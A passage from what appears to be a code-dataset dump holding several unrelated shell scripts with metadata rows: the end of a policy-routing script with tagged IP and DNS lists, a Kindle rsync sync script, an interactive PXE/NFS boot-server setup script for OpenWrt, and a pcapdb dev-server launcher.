114.112.200.128/27
114.112.202.0/24
114.112.220.0/22
115.47.0.0/16
115.172.0.0/14
115.181.128.0/26
115.182.0.0/15
115.190.0.0/15
116.204.64.0/18
116.205.0.0/17
116.205.128.0/18
116.218.0.0/19
116.218.128.0/18
116.242.0.0/15
117.75.0.0/17
118.28.0.0/15
118.144.0.0/16
118.145.0.0/19
118.147.0.0/16
118.186.194.0/23
118.186.198.0/23
118.186.245.192/26
118.192.32.0/21
118.195.65.0/24
118.195.66.0/24
118.195.128.0/21
118.196.0.0/14
118.205.128.0/17
118.206.0.0/15
118.228.148.0/23
118.244.0.0/16
118.246.0.0/15
119.6.72.0/23
119.57.28.0/24
119.59.128.0/17
119.78.0.0/23
119.79.0.0/16
119.97.178.32/28
119.97.178.56/29
119.97.183.128/25
120.64.244.0/24
120.65.32.0/19
120.65.88.0/21
120.87.39.0/24
121.37.24.0/21
121.37.32.0/21
121.41.240.0/21
121.68.0.0/15
121.251.53.0/24
122.49.0.0/18
123.98.0.0/16
123.138.38.0/24
123.139.156.224/28
123.147.250.128/25
123.147.251.128/25
123.196.112.0/20
123.197.128.0/17
124.14.0.0/15
124.16.76.0/22
124.16.84.0/22
124.16.88.0/22
124.16.96.0/23
124.16.128.192/26
124.16.248.0/22
124.16.252.0/22
124.17.34.0/23
124.42.128.0/18
124.172.168.0/22
124.172.172.0/24
124.172.174.0/23
124.172.176.0/24
124.172.177.0/24
124.174.0.0/15
124.192.0.0/15
124.200.0.0/15
124.202.0.0/16
124.203.128.0/17
124.204.0.0/14
124.243.212.0/22
124.254.0.0/18
125.39.34.0/23
125.39.66.128/27
125.39.66.160/28
125.39.68.64/26
125.39.68.128/27
125.39.68.176/28
125.39.68.192/27
125.39.68.224/28
125.39.143.32/28
159.226.110.0/23
159.226.112.0/24
159.226.115.0/24
159.226.117.0/25
159.226.165.0/24
168.160.249.0/24
168.160.250.0/23
168.160.254.0/24
175.188.0.0/14
180.86.0.0/16
180.88.0.0/14
182.50.0.0/22
182.242.192.0/19
198.76.196.0/24
202.4.252.0/22
202.14.235.0/24
202.14.236.0/23
202.14.238.0/24
202.38.152.0/23
202.91.128.0/22
202.99.0.0/23
202.99.58.0/24
202.106.102.192/27
202.106.160.0/21
202.130.0.0/19
203.26.161.0/24
203.86.24.0/21
203.88.216.0/23
203.158.16.0/21
203.207.64.0/19
203.207.112.0/20
203.207.128.0/18
203.207.192.0/21
203.207.208.0/20
203.207.224.0/19
206.219.44.0/23
206.219.52.0/23
210.51.168.128/28
210.72.26.0/23
210.73.0.0/20
210.74.0.0/19
210.74.188.0/22
210.75.96.0/19
210.76.96.0/19
210.76.192.0/22
210.76.197.0/24
210.76.198.0/23
210.76.202.0/24
210.76.206.0/23
210.76.208.0/23
210.76.210.0/24
210.76.212.0/22
210.76.216.0/22
210.77.2.0/23
210.77.4.0/22
210.77.8.0/21
210.77.22.0/23
210.77.24.0/22
210.77.31.0/24
210.78.32.0/20
210.79.64.0/18
211.100.224.0/19
211.101.0.0/18
211.103.128.0/17
211.147.0.0/19
211.148.64.0/18
211.149.32.0/19
211.149.64.0/19
211.154.160.0/20
211.155.128.0/19
211.155.240.0/20
211.161.0.0/16
211.162.0.0/16
211.167.224.0/19
218.5.96.0/23
218.241.0.0/19
218.241.128.0/17
218.244.224.0/19
218.247.0.0/19
218.247.128.0/17
218.249.0.0/16
219.234.0.0/21
219.234.80.0/20
219.234.128.0/17
219.238.0.0/15
220.112.0.0/14
220.152.128.0/17
220.181.42.224/27
220.231.128.0/20
223.20.0.0/15
223.192.0.0/16
223.208.0.0/14
223.255.0.0/17
# TAG: other addresses
211.161.192.0/18
10.0.0.0/8
172.16.0.0/12
192.168.0.0/16
211.161.159.0/24 # Wuhan
211.162.62.0/24 # GuangZhou, cutv
211.162.78.1 # ShenZhen
211.162.79.1 # ShenZhen
# BeiJing DNS
123.151.133.161
123.151.133.162
124.207.160.106
124.207.236.26
124.207.241.236
211.167.230.0/24
211.167.240.242
211.167.241.236
# Ajkdns
180.153.87.55
115.159.231.156
114.80.230.214
58.247.138.69
115.159.231.157
115.159.231.151
# TAG: sjhl, 世纪互联
# 世纪互联AS: 9308 9802 17428
58.83.128.0/17
59.151.0.0/17
60.28.192.0/19
60.29.240.0/20
120.135.16.0/20
120.135.32.0/19
120.135.64.0/18
125.39.24.0/22
125.39.92.0/22
125.39.164.0/22
125.39.188.0/22
125.39.192.0/22
125.39.216.0/22
125.39.220.0/22
125.39.232.0/22
203.196.0.0/22
203.196.4.0/24
210.77.128.0/18
211.99.160.0/21
211.99.168.0/22
211.99.178.0/24
211.99.183.0/24
211.99.188.0/22
211.99.192.0/19
211.151.0.0/16
211.152.0.0/19
211.152.96.0/19
# TAG: OTHERS
ns1.qingcdn.com
ns2.qingcdn.com
ns3.qingcdn.com
123.134.184.141
ns1.ialloc.com
ns2.ialloc.com
dns1.ourdvs.org
dns2.ourdvs.info
dns3.ourdvs.org
dns4.ourdvs.info
dns5.ourdvs.org
dns1.ourwebcdn.org
dns2.ourwebcdn.info
dns3.ourwebcdn.org
dns4.ourwebcdn.info
dns5.ourwebcdn.org
ns1.ourwebpic.info
ns2.ourwebpic.info
ns3.ourwebpic.info
ns4.ourwebpic.info
ns5.ourwebpic.info
dns1.ourwebpic.info
dns2.ourwebpic.info
dns3.ourwebpic.info
dns4.ourwebpic.info
dns5.ourwebpic.info
ns3.kunlungr.com
ns4.kunlungr.com
ns5.kunlungr.com
ns1.mmycdn.com
ns2.mmycdn.com
ns3.mmycdn.com
ns6.qh-lb.com
ns5.qh-lb.com
ns4.qh-lb.com
ns3.qh-lb.com
ns2.qh-lb.com
119.188.67.105
220.181.126.35
123.125.80.86
220.181.159.184
42.51.169.137
# TAG: NEWIPS
dns2.ourdvs.info
dns4.ourdvs.info
114.80.230.197
157.0.164.12
119.188.4.14.53
219.141.140.10
ns1-live.00cdn.com
ns2-live.00cdn.com
ns3-live.00cdn.com
ns4-live.00cdn.com
dns1.ourdvs.org
dns2.ourdvs.org
dns3.ourdvs.org
dns4.ourdvs.org
dns5.ourdvs.org
ns1.vcloudgtm.com
ns2.vcloudgtm.com
124.251.21.94
221.130.200.169
223.111.17.109
183.134.55.10
116.211.125.79
42.236.41.9
219.141.136.10
180.153.199.214
111.161.99.130
219.141.140.10
117.149.37.143
117.149.37.144
27.221.106.6
27.221.106.1
27.221.106.5
49.79.232.213
14.119.124.110
14.119.124.91
221.236.174.81
218.92.152.169
14.29.41.26
61.164.244.213
111.161.65.233
118.192.132.79
58.211.21.41
42.236.123.142
221.13.157.138
123.134.184.140
"
# arping_check: verify the configured gateway answers ARP on $NIC before
# any route is touched; terminates the whole script (status 2) when the
# gateway is unreachable.
# Globals read: MY_GW (gateway to probe), GW_test (test-env gateway), NIC.
arping_check() {
# skip check while testing
case $MY_GW in
$GW_test) return 0
esac
# start detect: a single quiet ARP probe; failure means routes via this
# gateway would be useless, so bail out early
if arping -I $NIC -c 1 -q $MY_GW; then
true
else
echo_red "arping $MY_GW failed, exit now"
exit 2
fi
}
# ANSI color definitions used by the echo_* helpers below.
CYAN_BOLD=$'\033[1;36m'
GREEN_BOLD=$'\e[1;32m'
MAGENTA_BOLD=$'\033[1;35m'
RED_BOLD=$'\e[1;31m'
YELLOW_BOLD=$'\e[1;33m'
# Reset sequence (the original assigned OFF twice; once is enough).
OFF=$'\e[0m'
# Print a green "ok" terminator for a progress line.
echo_ok_end() {
  printf '%s\n' "${GREEN_BOLD}ok${OFF}"
}
# Print a red "failed" terminator for a progress line.
echo_fail_end() {
  printf '%s\n' "${RED_BOLD}failed${OFF}"
}
# Print all arguments on one line in bold green (escape sequences in the
# message are interpreted, like the other echo_* helpers).
echo_green() {
  local msg="$*"
  echo -e "${GREEN_BOLD}${msg}${OFF}"
}
# Print all arguments on one line in bold red.
echo_red() {
  local msg="$*"
  echo -e "${RED_BOLD}${msg}${OFF}"
}
# Print all arguments on one line in bold yellow.
echo_yellow() {
  local msg="$*"
  echo -e "${YELLOW_BOLD}${msg}${OFF}"
}
# echo_already_did: report that a route is already present.
# When the global echo_already_did_opts equals "-v" (set when the user did
# NOT pass -v on the command line), print a transient message that the next
# output overwrites; otherwise print a persistent yellow line.
echo_already_did() {
if [ x$echo_already_did_opts == "x-v" ]; then
# \r\e[K rewinds and clears the line so repeated notes do not accumulate
echo -ne "${YELLOW_BOLD}already did${OFF}\r\e[K\e[0m"
else
echo_yellow "already did"
fi
}
# log: append a timestamped message to $LOG.
# $LOG defaults to "<script path>.log" and is resolved once on first call.
# Arguments: the message words to record.
log() {
# Quote the script path so names containing spaces still resolve.
[[ $LOG ]] || LOG=$( realpath "$0.log" )
# $(...) instead of backticks; quoted redirect target protects odd paths.
echo "$(date '+%F %T') $@" >> "$LOG"
}
# manual: report whether interactive (manual) mode is active.
# Returns 0 when MANUAL_MODE=1, 1 when MANUAL_MODE=0; any other value gets
# a warning and the function falls through with echo_yellow's status (0).
# Callers use "manual && <print something>" to gate console output.
manual() {
if [ $MANUAL_MODE -eq 1 ]; then
return 0
elif [ $MANUAL_MODE -eq 0 ]; then
return 1
else
echo_yellow "Invalid MANUAL_MODE value: $MANUAL_MODE"
fi
}
# resolvename: resolve a hostname via the resolver in $MYDNS and print the
# sorted addresses on stdout (no trailing newline). Returns 1 when dig's
# output carries the timeout banner, 0 otherwise.
# NOTE(review): when called without an argument this silently reuses any
# caller-visible $NAME -- presumably always called with $1; verify.
resolvename() {
[[ $1 ]] && local NAME=$1
local R=`dig @"$MYDNS" +short +time=2 $NAME 2>/dev/null | sort`
# the timeout banner in the output marks an unreachable resolver
if grep -q ';; connection timed out; no servers could be reached' <<< "$R"; then
return 1
else
echo -n "$R"
return 0
fi
}
# Consume answers from stdin until a recognised one arrives:
#   yes (any case) -> return 0, no (any case) -> return 1,
#   the literal word "quit" -> terminate the script with status 1.
# Unrecognised input re-prompts; EOF without an answer yields 0.
yes_or_no() {
  local reply
  while read reply; do
    if [[ ${reply,,} == yes ]]; then
      return 0
    elif [[ ${reply,,} == no ]]; then
      return 1
    elif [[ $reply == quit ]]; then
      exit 1
    else
      echo -n "I don't understand, (yes/no/quit) "
    fi
  done
  return 0
}
# print_help: show usage plus the list of available TAG names scraped from
# the "# TAG:" marker lines inside $ADDRESS_LIST_ALL, then exit(1).
print_help() {
echo "Usage: $0 [-v] {add|del|check|clean} {TAG|all}"
echo "In Gentoo, I can start/stop automatically while named with .start/.stop appended. eg: ${0}.start"
echo "TAG is partial matched and case sensitive, available TAGs are:"
# keep only the marker lines, strip the prefix, drop any remaining comments
grep ^"# TAG:" <<< "$ADDRESS_LIST_ALL" | sed -e 's/^# TAG:/ /' -e '/^#/d'
exit 1
}
# get_my_ip: print the first configured IPv4 address on $NIC that matches
# one of the known service addresses (IP_dns*/IP_ns*/IP_yd*/IP_re*/IP_test),
# with the CIDR prefix stripped.
# NOTE(review): the trailing sed assumes a two-digit prefix length (e.g.
# /24); a /8 style prefix would not be stripped cleanly -- verify.
get_my_ip() {
ip -4 addr show dev $NIC | \
awk '/^ inet / && ( \
/'$IP_dns1'\// || \
/'$IP_dns2'\// || \
/'$IP_dns3'\// || \
/'$IP_dns4'\// || \
/'$IP_dns5'\// || \
/'$IP_dns6'\// || \
/'$IP_dns7'\// || \
/'$IP_dns8'\// || \
/'$IP_ns1'\// || \
/'$IP_ns2'\// || \
/'$IP_ns5'\// || \
/'$IP_ns6'\// || \
/'$IP_ns7'\// || \
/'$IP_ns8'\// || \
/'$IP_yd1'\// || \
/'$IP_yd2'\// || \
/'$IP_yd3'\// || \
/'$IP_yd4'\// || \
/'$IP_re1'\// || \
/'$IP_re2'\// || \
/'$IP_re3'\// || \
/'$IP_re4'\// || \
/'$IP_test'\// \
) {print $2}' | \
sed -e 's/\/..$//'
}
# Loose IPv4 shape test: four dot-separated groups each beginning with a
# digit (it does not validate octet ranges).
# Returns 0 on a match, 1 otherwise, 2 for a missing/empty argument.
is_ip_address() {
  [[ $1 ]] || return 2
  if [[ $1 == [0-9]*.[0-9]*.[0-9]*.[0-9]* ]]; then
    return 0
  fi
  return 1
}
# is_legal_line: filter one parsed address-list line.
# Reads dst_addr and trash1 from the calling scope (populated by the
# caller's `read dst_addr trash1`). Returns 1 for blank lines, comment
# lines, and TAG headers (which are echoed in manual mode except during
# 'clean'); returns 0 for usable address lines.
is_legal_line() {
# Obtain variables from parent: dst_addr trash1
# Don't accept empty line
[[ $dst_addr ]] || return 1
# Show TAG
case $trash1 in
TAG:*)
# Don't print TAG while 'clean'.
if [ x$ACTION == xclean ]; then
true
else
manual && echo -e "\n${CYAN_BOLD}${trash1}${OFF}"
return 1
fi
;;
esac
# Don't accept comment line
case $dst_addr in
"#"*) return 1;;
*\.*) return 0
esac
}
# Succeeds (0) when an exact route "DST via $MY_GW ..." is already present
# in the kernel routing table, fails (1) otherwise.
in_routing_table() {
  local dst_ip=$1
  ip route list | grep -q ^"$dst_ip via $MY_GW " || return 1
}
# _ip_route_: add or delete one host route (per global $ACTION) via $MY_GW
# on $NIC, with console feedback in manual mode and a line in the log.
# Arguments: $1 = destination IP; $2 = "IS_IP_FLAG" when $1 came straight
# from the address list (suppresses the "=> IP" suffix in messages).
# Also reads: dst_addr (caller scope), NXIP (NXDOMAIN-redirect blacklist).
# Returns 0 on success / already-added, 1 on failure or bad IP.
_ip_route_() {
local dst_ip=$1
if [[ $2 ]] && [ x"$2" == "xIS_IP_FLAG" ]; then
local EXTRA_MSG=
else
local EXTRA_MSG="=> $dst_ip "
fi
manual && echo -n "${ACTION}ing: ${dst_addr} ${EXTRA_MSG:+$EXTRA_MSG}"
# Filter out NXDOMAIN pointed IP
if grep -q ^"$dst_ip"$ <<< "$NXIP"; then
echo_red "bad IP, NXDOMAIN redirected"
return 1
fi
# Skip no-op operations: adding an existing route or deleting a missing one.
case $ACTION in
add)
in_routing_table $dst_ip && {
manual && echo_already_did
return 0
}
;;
del)
in_routing_table $dst_ip || {
manual && echo_red "${RED_BOLD}not in routing table${OFF}"
return 1
}
;;
*)
echo_red "not supported ACTION: ${ACTION}"
return 1
esac
if ip route $ACTION $dst_ip via $MY_GW dev $NIC; then
log "$ACTION: $dst_addr "$EXTRA_MSG
manual && echo_ok_end
return 0
else
log "$ACTION failed: $dst_addr"$EXTRA_MSG
manual && echo_fail_end
return 1
fi
}
# change_route: walk every legal line of $ADDRESS_LIST and apply $ACTION
# (add/del) to it via _ip_route_. Exits 127 when the list is empty.
# Plain IPs are routed directly; hostnames are resolved first and every
# returned A record is routed.
change_route() {
if [[ $ADDRESS_LIST ]]; then
true
else
manual && \
echo_red "ADDRESS_LIST is empty, exit now." || \
log "ADDRESS_LIST is empty"
exit 127
fi
local dst_addr trash1
while read dst_addr trash1; do
is_legal_line && true || continue
# Add IP entries directly; resolve hostnames to IPs first.
if is_ip_address $dst_addr; then
_ip_route_ $dst_addr IS_IP_FLAG
else
IPs=`resolvename $dst_addr`
[[ $IPs ]] || {
manual && echo -n "${ACTION}ing: ${dst_addr} ${EXTRA_MSG:+$EXTRA_MSG}"
manual && echo "${RED_BOLD}resolution failed${OFF}"
continue
}
for dst_ip in $IPs; do
if is_ip_address $dst_ip; then
_ip_route_ $dst_ip
else
# dig may return CNAME targets instead of addresses; skip those
manual && \
echo "${RED_BOLD}Invalid IP detected, maybe CNAMEed NS${OFF}: "$dst_ip || \
log "Invalid IP detected, maybe CNAMEed NS: $dst_ip"
fi
done
fi
done <<< "$ADDRESS_LIST"
}
# Determine my environment: map the address found on $NIC to this host's
# MY_IP/MY_GW pair. Unknown addresses print a hint and exit.
# Fixed: the ns7/ns8 arms used to assign the ns6 address/gateway (copy-paste
# bug). Assumes GW_ns7/GW_ns8 are defined in the config section above --
# verify alongside IP_ns7/IP_ns8, which get_my_ip already references.
case `get_my_ip` in
$IP_dns1) MY_IP=$IP_dns1; MY_GW=$GW_dns1;;
$IP_dns2) MY_IP=$IP_dns2; MY_GW=$GW_dns2;;
$IP_dns3) MY_IP=$IP_dns3; MY_GW=$GW_dns3;;
$IP_dns4) MY_IP=$IP_dns4; MY_GW=$GW_dns4;;
$IP_dns5) MY_IP=$IP_dns5; MY_GW=$GW_dns5;;
$IP_dns6) MY_IP=$IP_dns6; MY_GW=$GW_dns6;;
$IP_dns7) MY_IP=$IP_dns7; MY_GW=$GW_dns7;;
$IP_dns8) MY_IP=$IP_dns8; MY_GW=$GW_dns8;;
$IP_ns1) MY_IP=$IP_ns1; MY_GW=$GW_ns1;;
$IP_ns2) MY_IP=$IP_ns2; MY_GW=$GW_ns2;;
$IP_ns5) MY_IP=$IP_ns5; MY_GW=$GW_ns5;;
$IP_ns6) MY_IP=$IP_ns6; MY_GW=$GW_ns6;;
$IP_ns7) MY_IP=$IP_ns7; MY_GW=$GW_ns7;;
$IP_ns8) MY_IP=$IP_ns8; MY_GW=$GW_ns8;;
$IP_yd1) MY_IP=$IP_yd1; MY_GW=$GW_yd1;;
$IP_yd2) MY_IP=$IP_yd2; MY_GW=$GW_yd2;;
$IP_yd3) MY_IP=$IP_yd3; MY_GW=$GW_yd3;;
$IP_yd4) MY_IP=$IP_yd4; MY_GW=$GW_yd4;;
$IP_re1) MY_IP=$IP_re1; MY_GW=$GW_re1;;
$IP_re2) MY_IP=$IP_re2; MY_GW=$GW_re2;;
$IP_re3) MY_IP=$IP_re3; MY_GW=$GW_re3;;
$IP_re4) MY_IP=$IP_re4; MY_GW=$GW_re4;;
$IP_test)
MY_IP=$IP_test
MY_GW=$GW_test
# Mask DNS IPs I will use later in the test environment.
ADDRESS_LIST_ALL="$( sed \
-e '/211.161.192./d' \
-e '/211.161./d' <<< "$ADDRESS_LIST_ALL" )"
;;
*)
cat <<EOF
This script is not suitable for this server ...
For testing purpose, please execute below command on your local host:
ip addr add 1.1.1.1/30 dev $NIC
EOF
exit 0
esac
# Name it with '.start|.stop' appended will lead to add/del route & exit.
# (Gentoo-style symlinks: <script>.start adds all routes silently, logging
# to <script>.log; <script>.stop deletes them. Any other name falls through
# to interactive argument handling below.)
case $0 in
*.start)
ACTION="add"
ADDRESS_LIST="$ADDRESS_LIST_ALL"
LOG=$( realpath $0 ).log
MANUAL_MODE=0
change_route
exit 0
;;
*.stop)
ACTION="del"
ADDRESS_LIST="$ADDRESS_LIST_ALL"
LOG=$( realpath $0 ).log
MANUAL_MODE=0
change_route
exit 0
;;
*)
true
esac
# check arguments: both an action and a TAG/all are required
[[ $1 ]] && [[ $2 ]] || print_help
# check gateway, exit if detect failed
# (the shell builtin `command -v` replaces the external `which`)
if command -v arping &>/dev/null; then
arping_check
else
echo_red "command not found, check skipped: arping"
fi
# Determine if show "already did" message: passing -v makes the repeated
# "already did" notes persistent instead of transient (see echo_already_did).
case $1 in
-v)
echo_already_did_opts=""
shift
;;
*)
echo_already_did_opts="-v"
esac
# Determine address-list section to operate: "all" takes the whole list,
# otherwise sed extracts the lines from the matching "# TAG:" header down
# to the next blank line. TAG match is partial and case sensitive.
case $2 in
all)
ADDRESS_LIST="$ADDRESS_LIST_ALL"
;;
*/*)
# sed can not match '/' here (it is the pattern delimiter), so banned.
echo_yellow "You can't use '/' in TAG name :("
echo
print_help
;;
*)
ADDRESS_LIST=$( sed -ne '/TAG: '$2'/,/^$/p' <<< "$ADDRESS_LIST_ALL" )
if [[ $ADDRESS_LIST ]]; then
true
else
echo "${RED_BOLD}TAG invalid${OFF}: $2"
echo
print_help
fi
esac
# Determine action to take.
#   add/del : apply the chosen ADDRESS_LIST via change_route.
#   check   : resolve every entry and print +/- depending on whether each
#             address is currently in the routing table.
#   clean   : diff the kernel routing table against the full address list
#             and (after confirmation) delete the leftover routes.
case $1 in
del)
ACTION="del"
change_route
;;
add)
ACTION="add"
change_route
;;
check)
ACTION="check"
while read dst_addr trash1; do
is_legal_line && true || continue
if is_ip_address $dst_addr; then
IS_IP_FLAG=1
IPs=$dst_addr
else
IS_IP_FLAG=0
IPs=`resolvename $dst_addr`
fi
# show failed resolution
if ! [[ $IPs ]]; then
echo -en "${YELLOW_BOLD}*${OFF} "
echo -n $dst_addr
echo_red " resolution failed"
fi
for dst_ip in $IPs; do
# check if the address in routing table
if in_routing_table $dst_ip; then
echo -en "${GREEN_BOLD}+${OFF} "
else
echo -en "${RED_BOLD}-${OFF} "
fi
# print message
if [ $IS_IP_FLAG -eq 1 ]; then
echo $dst_addr
elif [ $IS_IP_FLAG -eq 0 ]; then
echo "$dst_addr => "$dst_ip
else
echo_red "Unexpected error detected"
fi
done
done <<< "$ADDRESS_LIST"
echo "(${GREEN_BOLD}+${OFF}) in head means this IP lives in routing table, (${RED_BOLD}-${OFF}) not in."
;;
clean)
ACTION="clean"
ADDRESS_LIST="$ADDRESS_LIST_ALL"
# clean by TAG is not possible now, so just clean all
ROUTE_TABLE=$( ip route list all )
# strip_from_table IP: drop the route for IP from the local ROUTE_TABLE
# snapshot; whatever remains afterwards is not covered by the address
# list and becomes a deletion candidate.
strip_from_table() {
local dst_ip=$1
if [[ $dst_ip ]] && is_ip_address $dst_ip; then
in_routing_table $dst_ip && ROUTE_TABLE=$( grep -v ^"$dst_ip via $MY_GW " <<< "$ROUTE_TABLE" )
else
echo "${RED_BOLD}Error in $FUNCNAME while cleaning${OFF}: $dst_addr"
fi
}
CNT_ALL=$( echo "$ADDRESS_LIST" | wc -l )
CNT=1
while read dst_addr trash1; do
is_legal_line && true || continue
if is_ip_address $dst_addr; then
dst_ip=$dst_addr
strip_from_table $dst_ip
else
IPs=`resolvename $dst_addr`
for dst_ip in $IPs; do
strip_from_table $dst_ip
done
fi
# Show progress
echo -en "\rProcessing ($CNT/$CNT_ALL): $dst_addr\e[K\e[0m"
let CNT++
done <<< "$ADDRESS_LIST"
echo -en "\r\e[K\e[0m"
# Strip routes of myself (default route, host/link scope, loopback).
ROUTE_TABLE=$( sed -e '/^default via/d' \
-e '/scope host/d' \
-e '/dev lo $/d' \
-e '/scope link/d' <<< "$ROUTE_TABLE" )
if [[ $ROUTE_TABLE ]]; then
# echo "Routes to clean:"
echo "$ROUTE_TABLE"
echo -n "${YELLOW_BOLD}Routes above will be deleted, OK?${OFF} (yes/no/quit) "
yes_or_no || exit 0
while read R; do
if ip route del $R; then
log "$ACTION: $R"
else
log "$ACTION failed: $R"
echo "${RED_BOLD}fail to delete${OFF}: $R"
fi
done <<< "$ROUTE_TABLE"
else
echo_green "Great, nothing to clean :)"
fi
;;
*)
print_help
esac
| true
|
801fbf2269952e2965b37002fe04ea285a42f3c8
|
Shell
|
byteorgshiva/scripts
|
/update-kindle-work-first.sh
|
UTF-8
| 552
| 2.53125
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Sync .mobi books from the BitTorrent Sync share to the Kindle, pruning
# deleted files and empty directories.
#FROM=/cygdrive/c/cygwin64/home/RKurr/BitTorrentSync/Todd/mobi/
#FROM=/cygdrive/i/BitTorrenSync/Todd/mobi/
#FROM=/cygdrive/i/BitTorrenSync/Todd\ Books/Apps/
FROM="/cygdrive/d/BitTorrent Sync/Apps/"
TO=/cygdrive/e/documents/transparent-language
# Build the command as an argv array instead of eval-ing a string: the
# quoted --exclude patterns and the space in $FROM survive intact.
CMD=(rsync --verbose --recursive --checksum --delete --prune-empty-dirs
     --human-readable --progress --itemize-changes
     --exclude='Packet Publishing/'
     --exclude='Free and Not Updated O?Reilly Books/'
     --include='*/' --include='[0-9A-Ll]*.mobi' --exclude='*'
     "$FROM" "$TO")
echo "${CMD[@]}"
"${CMD[@]}"
| true
|
0aee24eec4d6fe5c56c9c7d43a3a89711f406036
|
Shell
|
6donote4/debian-scripts
|
/OTHER/pxec.sh
|
UTF-8
| 4,540
| 3.6875
| 4
|
[] |
no_license
|
#!/bin/bash
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:~/bin
export PATH
#========================================
# Linux Distribution: Manjaro/Debian 8+/
# Author: 6donote4 <mailto:do_note@hotmail.com>
# Description: Config pxe server for openwrt.
# Version: 0.0.1
# Blog: https://www.donote.tk https://6donote4.github.io
#========================================
# This script is used to config pxe server for openwrt.
VERSION=0.0.1
PROGNAME="$(basename $0)"
export LC_ALL=C
SCRIPT_UMASK=0122
umask $SCRIPT_UMASK
# usage: print the option summary on stdout.
usage() {
cat << EOF
pxec.sh $VERSION
Usage:
./$PROGNAME [option]
Options
-i Initialization
-s Start configuartion
-d dnsmasq settings
-n nfs-server settings
--version Show version
-h --help Show this usage
EOF
}
red='\033[0;31m'
green='\033[0;32m'
yellow='\033[0;33m'
plain='\033[0m'
if [[ "$1" == "" ]];then
usage
exit 0
fi
# Init: mount the NFS export holding the OS images under the PXE tree.
Init() {
mkdir -p /mnt/PXEboot/OS/linux
#mkdir -p /mnt/media
read -p "Please input nfs server address:" NFS_ADDR
echo "nfs server address: $NFS_ADDR"
showmount -e $NFS_ADDR #nfs-server nfs-client nfs-utils
read -p "Please input nfs path:" NFS_PATH
echo "nfs path:$NFS_PATH"
# mount.nfs $NFS_ADDR:$NFS_PATH /mnt/media
mount.nfs $NFS_ADDR:$NFS_PATH /mnt/PXEboot/OS/linux
}
# pxeboot: copy the syslinux BIOS and UEFI boot files into the PXE tree.
# Expects an unpacked syslinux-6.03/ tree in the current directory.
pxeboot() {
# wget https://www.kernel.org/pub/linux/utils/boot/syslinux/syslinux-6.03.tar.xz
# download the syslinux source package
# tar -xf syslinux-6.03.tar.xz
# unpack it
cd syslinux-6.03/
# enter the tree and copy the boot files into the PXE boot directory
# BIOS boot files first
mkdir -p /mnt/PXEboot/bios
cp ./bios/core/pxelinux.0 /mnt/PXEboot/bios/
cp ./bios/com32/elflink/ldlinux/ldlinux.c32 /mnt/PXEboot/bios/
cp ./bios/com32/lib/libcom32.c32 /mnt/PXEboot/bios/
cp ./bios/com32/libutil/libutil.c32 /mnt/PXEboot/bios/
cp ./bios/com32/menu/vesamenu.c32 /mnt/PXEboot/bios/
# then the UEFI boot files (64-bit ones are used here)
mkdir -p /mnt/PXEboot/uefi
cp efi64/efi/syslinux.efi /mnt/PXEboot/uefi/
cp efi64/com32/elflink/ldlinux/ldlinux.e64 /mnt/PXEboot/uefi/
cp efi64/com32/menu/vesamenu.c32 /mnt/PXEboot/uefi/
cp efi64/com32/lib/libcom32.c32 /mnt/PXEboot/uefi/
cp efi64/com32/libutil/libutil.c32 /mnt/PXEboot/uefi/
}
# cfgfile: interactively build pxelinux.cfg/default (NFS netboot entry)
# and symlink it plus the OS tree into both the bios and uefi directories.
cfgfile() {
mkdir -p /mnt/PXEboot/pxelinux.cfg/
# create the cfg directory under the PXE boot root
read -p "Please input OS label:" LABEL
read -p "Please input OS path(/mnt/PXEboot/OS/linux):" OPATH
ls $OPATH
read -p "Please input Root directory:" ROOT_DIR
read -p "Please input OS kernel name: " KNAME
read -p "Please input OS initrd name: " INAME
read -p "Please input PXE server address: " PADDR
read -p "Please input boot initrd name:" INITRDB
echo "label:$LABEL"
echo "kernel root/name:$ROOT_DIR/$KNAME"
echo "initrd root/name:$ROOT_DIR/$INAME"
echo "PXE server address:$PADDR"
echo "boot initrd name: $INITRDB"
cat <<EOF > /mnt/PXEboot/pxelinux.cfg/default
# 新建文件,写入以下内容
DEFAULT vesamenu.c32
MENU TITLE My PXEboot Server
PROMPT 0
TIMEOUT 100
label $LABEL amd64
KERNEL OS/linux/$ROOT_DIR/$KNAME
INITRD OS/linux/$ROOT_DIR/$INAME
APPEND netboot=nfs nfsroot=$PADDR:/mnt/PXEboot/OS/linux/$ROOT_DIR boot=$INITRDB quiet splash --
EOF
cd /mnt/PXEboot/bios
ln -s ../pxelinux.cfg/
ln -s ../OS/
cd -
cd /mnt/PXEboot/uefi
ln -s ../pxelinux.cfg/
ln -s ../OS/
}
# dhcpsettings: append TFTP/PXE boot options to dnsmasq's config (the
# dhcp-match line picks the UEFI loader for EFI clients) and restart it.
dhcpsettings() {
cat >> /etc/dnsmasq.conf <<EOF
# filename: /etc/dnsmasq.conf
# 在最后添加以下几行,这里会根据client类型自动选择镜像
enable-tftp
tftp-root=/mnt/PXEboot
dhcp-boot=bios/pxelinux.0
dhcp-match=set:efi-x86_64,option:client-arch,7
dhcp-boot=tag:efi-x86_64,uefi/syslinux.efi
# enable dhcp
# dhcp-range=192.168.2.10,192.168.2.200,12h
# dhcp-option=3,192.168.2.254
# dhcp-option=option:dns-server,114.114.114.114,119.29.29.29
# disable dns
port=0
EOF
/etc/init.d/dnsmasq restart
}
# nfs_server_settings: export /mnt read-only and restart the NFS daemon.
nfs_server_settings () {
cat >> /etc/exports <<EOF
/mnt *(ro,all_squash,insecure,sync)
EOF
/etc/init.d/nfsd restart
}
main() {
pxeboot
cfgfile
}
ARGS=( "$@" )
case "$1" in
-i)
Init
echo "done"
exit 0
;;
-s)
main
echo "done"
exit 0
;;
-d)
dhcpsettings
echo "done"
;;
-n)
nfs_server_settings
echo "done"
;;
-h|--help)
usage
exit 0
;;
--version)
echo $VERSION
exit 0
;;
*)
echo "Invalid parameter $1" 1>&2
exit 1
;;
esac
| true
|
99c835e8918f5d9693b1cd9c3294724f10e1c8d5
|
Shell
|
near-feign/pcapdb
|
/core/runserver
|
UTF-8
| 242
| 3.28125
| 3
|
[
"BSD-3-Clause",
"BSD-2-Clause"
] |
permissive
|
#!/bin/sh
# Launch the Django dev server bound to this host's name, on the http_port
# configured in ../etc/pcapdb.cfg (default port when the key is absent).
# The doubled braces in the awk program are just a harmless nested block.
HTTP_PORT=$(grep ^http_port ../etc/pcapdb.cfg | awk -F= '{{ print $2 }}' | tr -d '[[:space:]]')
if [ -z "${HTTP_PORT}" ]; then
URI=$(hostname)
else
URI=$(hostname):${HTTP_PORT}
fi
../bin/python manage.py runserver ${URI}
| true
|
